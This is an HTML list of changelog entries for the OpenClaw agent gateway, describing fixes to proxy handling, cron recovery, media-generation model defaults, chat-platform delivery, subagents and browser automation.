<li>Memory-host SDK: use trusted env-proxy mode for remote embedding and batch HTTP calls only when Undici will proxy that target, preserving SSRF DNS pinning for <code>ALL_PROXY</code>-only and <code>NO_PROXY</code> bypass cases. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115438877" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52162" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52162/hovercard" href="https://github.com/openclaw/openclaw/issues/52162">#52162</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327688904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71506/hovercard" href="https://github.com/openclaw/openclaw/pull/71506">#71506</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DhtIsCoding/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DhtIsCoding">@DhtIsCoding</a>.</li>
<li>Gateway/dashboard: render Control UI and WebSocket links with <code>https://</code>/<code>wss://</code> when <code>gateway.tls.enabled=true</code>, including <code>openclaw gateway status</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327630185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71494" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71494/hovercard" href="https://github.com/openclaw/openclaw/issues/71494">#71494</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327660439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71499" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71499/hovercard" href="https://github.com/openclaw/openclaw/pull/71499">#71499</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deepkilo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deepkilo">@deepkilo</a>.</li>
<li>Agents/OpenAI-compatible: default proxy/local completions tool requests to <code>tool_choice: "auto"</code> when tools are present, so providers enter native tool-calling mode instead of replying with plain-text tool directives. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327534098" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71472" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71472/hovercard" href="https://github.com/openclaw/openclaw/pull/71472">#71472</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Speed-maker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Speed-maker">@Speed-maker</a>.</li>
<li>OpenAI image generation: use <code>gpt-5.5</code> for the Codex OAuth responses transport instead of the retired <code>gpt-5.4</code> model, fixing 500s from ChatGPT Codex image generation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327703791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71513/hovercard" href="https://github.com/openclaw/openclaw/issues/71513">#71513</a>. Thanks @baolongl.</li>
<li>OpenAI image generation: route transparent-background default-model requests to <code>gpt-image-1.5</code>, document the expected <code>image_generate</code> call shape, and keep Azure/custom OpenAI-compatible deployment names untouched.</li>
<li>Google video generation: download direct MLDev Veo <code>video.uri</code> results instead of passing them through the Files API path, fixing 404s after successful generation/polling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324817492" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71200" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71200/hovercard" href="https://github.com/openclaw/openclaw/issues/71200">#71200</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/panhaishan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/panhaishan">@panhaishan</a>.</li>
<li>Google video generation: fall back to the REST <code>predictLongRunning</code> Veo endpoint for text-only SDK 404s while keeping reference image/video generation on the SDK path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215587624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62309/hovercard" href="https://github.com/openclaw/openclaw/issues/62309">#62309</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222914272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63008/hovercard" href="https://github.com/openclaw/openclaw/issues/63008">#63008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216005545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62343" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62343/hovercard" href="https://github.com/openclaw/openclaw/pull/62343">#62343</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leoleedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leoleedev">@leoleedev</a>.</li>
<li>MiniMax music generation: switch the bundled default model from the unsupported <code>music-2.5+</code> id to the current <code>music-2.6</code> API model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245010440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64870/hovercard" href="https://github.com/openclaw/openclaw/issues/64870">#64870</a> and addresses the music default from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215652478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62315/hovercard" href="https://github.com/openclaw/openclaw/issues/62315">#62315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/noahclanman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/noahclanman">@noahclanman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwardzheng1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwardzheng1">@edwardzheng1</a>.</li>
<li>Cron: record jobs interrupted by a gateway restart as failed at their original <code>runningAtMs</code>, skip unsafe startup replay, and disable interrupted one-shot jobs so they show a visible failure instead of silently disappearing or duplicating work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187207893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59056" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59056/hovercard" href="https://github.com/openclaw/openclaw/issues/59056">#59056</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207476732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61343/hovercard" href="https://github.com/openclaw/openclaw/issues/61343">#61343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231039858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63657/hovercard" href="https://github.com/openclaw/openclaw/issues/63657">#63657</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190617901" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59301" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59301/hovercard" href="https://github.com/openclaw/openclaw/issues/59301">#59301</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ponchoooPenguin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ponchoooPenguin">@ponchoooPenguin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daemic24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daemic24">@daemic24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myradon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myradon">@myradon</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hikiwibot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hikiwibot">@hikiwibot</a>.</li>
<li>Cron tool: recover flat top-level schedule shorthand such as <code>cron</code>, <code>tz</code>, and <code>staggerMs</code> before gateway validation, so model-generated cron add/update calls preserve cron jitter settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyxben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyxben">@tyxben</a>.</li>
<li>Cron: hydrate flat legacy job rows with top-level <code>cron</code>, <code>tz</code>, <code>session</code>, and <code>message</code> fields into canonical schedule, target, and payload objects before startup recomputes run times. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059364525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43351/hovercard" href="https://github.com/openclaw/openclaw/issues/43351">#43351</a>.</li>
<li>Agents/replies: let pending group chat history trigger bare mentioned turns without treating metadata-only inbound context as user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327616390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71489" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71489/hovercard" href="https://github.com/openclaw/openclaw/issues/71489">#71489</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327739393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71520/hovercard" href="https://github.com/openclaw/openclaw/pull/71520">#71520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Google media generation: strip a configured trailing <code>/v1beta</code> from Google music/video provider base URLs before calling the Google GenAI SDK, preventing doubled <code>/v1beta/v1beta</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226005033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63240" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63240/hovercard" href="https://github.com/openclaw/openclaw/issues/63240">#63240</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226196460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63258/hovercard" href="https://github.com/openclaw/openclaw/pull/63258">#63258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hybirdss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hybirdss">@Hybirdss</a>.</li>
<li>Discord: restore direct-message voice-note preflight transcription and classify URL-only Ogg/Opus voice attachments as audio while skipping partial attachments without usable URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207287932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61314/hovercard" href="https://github.com/openclaw/openclaw/issues/61314">#61314</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244552483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64803/hovercard" href="https://github.com/openclaw/openclaw/issues/64803">#64803</a>.</li>
<li>Plugins/build: copy bundled plugin skill trees into <code>dist-runtime</code>, broaden Windows symlink-copy fallbacks, and fingerprint runtime dependencies from <code>lstat</code> so symlink-like directory entries cannot crash staging.</li>
<li>Google Chat: preserve reply text when a typing indicator message is deleted or can no longer be updated, so media captions and first text chunks are resent instead of silently disappearing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327650702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71498" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71498/hovercard" href="https://github.com/openclaw/openclaw/pull/71498">#71498</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-lgtm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-lgtm">@colin-lgtm</a>.</li>
<li>Cron: tolerate malformed legacy job rows in startup, main-session system-event payloads, and human-readable <code>cron list</code> output so missing <code>state</code>, <code>payload.text</code>, or display fields no longer crash the scheduler or CLI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256052544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66016/hovercard" href="https://github.com/openclaw/openclaw/issues/66016">#66016</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254208406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65916/hovercard" href="https://github.com/openclaw/openclaw/issues/65916">#65916</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237081136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64137/hovercard" href="https://github.com/openclaw/openclaw/issues/64137">#64137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173024002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57872/hovercard" href="https://github.com/openclaw/openclaw/issues/57872">#57872</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197639692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59968/hovercard" href="https://github.com/openclaw/openclaw/issues/59968">#59968</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233361564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63813/hovercard" href="https://github.com/openclaw/openclaw/issues/63813">#63813</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120171658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52804/hovercard" href="https://github.com/openclaw/openclaw/issues/52804">#52804</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057886163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43163" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43163/hovercard" href="https://github.com/openclaw/openclaw/issues/43163">#43163</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327695420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71509" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71509/hovercard" href="https://github.com/openclaw/openclaw/pull/71509">#71509</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/models: make <code>openclaw models scan</code> fall back to public OpenRouter free-model metadata when no <code>OPENROUTER_API_KEY</code> is configured, avoid config secret resolution for explicit <code>--no-probe</code> scans, and apply the scan timeout to the OpenRouter catalog request.</li>
<li>Feishu: keep streaming cards to one live card per turn, flush throttled card edits after meaningful text boundaries, and skip exact block/partial repeats so tool-heavy replies do not duplicate card output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allan0509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allan0509">@allan0509</a>.</li>
<li>Feishu: finish the streaming-card duplicate closeout by stripping leaked reasoning tags, preserving cross-block partial snapshots, enabling topic-thread streaming cards, omitting the generic <code>main</code> card header, surfacing transient tool/compaction status, and cleaning streaming state after close failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sesame437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sesame437">@sesame437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vicky-v7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vicky-v7">@Vicky-v7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoku-family/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoku-family">@maoku-family</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pengxiao-Wang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pengxiao-Wang">@Pengxiao-Wang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Maple778/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Maple778">@Maple778</a>.</li>
<li>Telegram: recover incomplete partial-stream previews by falling back to a final send when an ambiguous final edit failure would otherwise retain a strict prefix of the answer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327777647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71525/hovercard" href="https://github.com/openclaw/openclaw/issues/71525">#71525</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327970972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71554/hovercard" href="https://github.com/openclaw/openclaw/pull/71554">#71554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Control UI/chat: collapse assistant token/model context details behind an explicit Context disclosure and show full dates in message footers, making historical transcript timing clear without noisy default metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326580782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71337/hovercard" href="https://github.com/openclaw/openclaw/pull/71337">#71337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>OpenAI/Codex OAuth: explain <code>unsupported_country_region_territory</code> token-exchange failures with a proxy/region hint instead of surfacing a generic OAuth error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109246729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51175/hovercard" href="https://github.com/openclaw/openclaw/issues/51175">#51175</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327668763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71501/hovercard" href="https://github.com/openclaw/openclaw/pull/71501">#71501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wulala-xjj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wulala-xjj">@wulala-xjj</a>.</li>
<li>Browser/Linux: fall back to headless mode for local managed profiles on hosts without a display server, while preserving explicit per-profile headed overrides and reporting the headless source. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205308957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60953/hovercard" href="https://github.com/openclaw/openclaw/pull/60953">#60953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rrpsantos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rrpsantos">@rrpsantos</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Telegram: keep the polling stall watchdog active even when grammY reports the runner as not running while its task is still pending, so a rebuilt transport cannot leave <code>getUpdates</code> silent until a manual gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291652137" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69064/hovercard" href="https://github.com/openclaw/openclaw/issues/69064">#69064</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LDLoeb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LDLoeb">@LDLoeb</a>.</li>
<li>Subagents: fall back to direct completion delivery when the parent announce turn finishes without a visible payload, so child results still reach channel-backed requester sessions.</li>
<li>Subagents: tell parent agents to use <code>sessions_yield</code> while waiting for child completion events, preventing GPT-5 fast runs from ending silently after spawning workers.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/CLI: lazy-load browser command groups and plugin runtime services so <code>openclaw browser --help</code> can render without loading the full browser automation stack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248388921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65400/hovercard" href="https://github.com/openclaw/openclaw/issues/65400">#65400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248899051" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65460/hovercard" href="https://github.com/openclaw/openclaw/pull/65460">#65460</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263144074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66640" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66640/hovercard" href="https://github.com/openclaw/openclaw/pull/66640">#66640</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pandego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pandego">@pandego</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianworld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianworld">@Tianworld</a>.</li>
<li>Browser/CLI: serve precomputed <code>openclaw browser --help</code> text from CLI startup metadata, avoiding the full plugin/config startup path for the common help invocation.</li>
<li>Browser/downloads: seed managed Chrome profiles with OpenClaw download prefs and capture unmanaged click-triggered downloads under the guarded downloads directory, while explicit download waiters still own their target file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242367248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64558/hovercard" href="https://github.com/openclaw/openclaw/pull/64558">#64558</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pearcekieser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pearcekieser">@Pearcekieser</a>.</li>
<li>Browser/Chrome: stop passing redundant <code>--disable-setuid-sandbox</code> when <code>browser.noSandbox</code> is enabled; <code>--no-sandbox</code> remains the effective sandbox opt-out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279830525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67939/hovercard" href="https://github.com/openclaw/openclaw/pull/67939">#67939</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebykrueger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebykrueger">@sebykrueger</a>.</li>
<li>Browser/client: stop telling agents to permanently avoid the browser after transient timeout or cancellation failures; keep the no-retry hint for persistent unavailable/rate-limit cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076448290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46505/hovercard" href="https://github.com/openclaw/openclaw/pull/46505">#46505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jriff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jriff">@jriff</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Co-Messi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Co-Messi">@Co-Messi</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
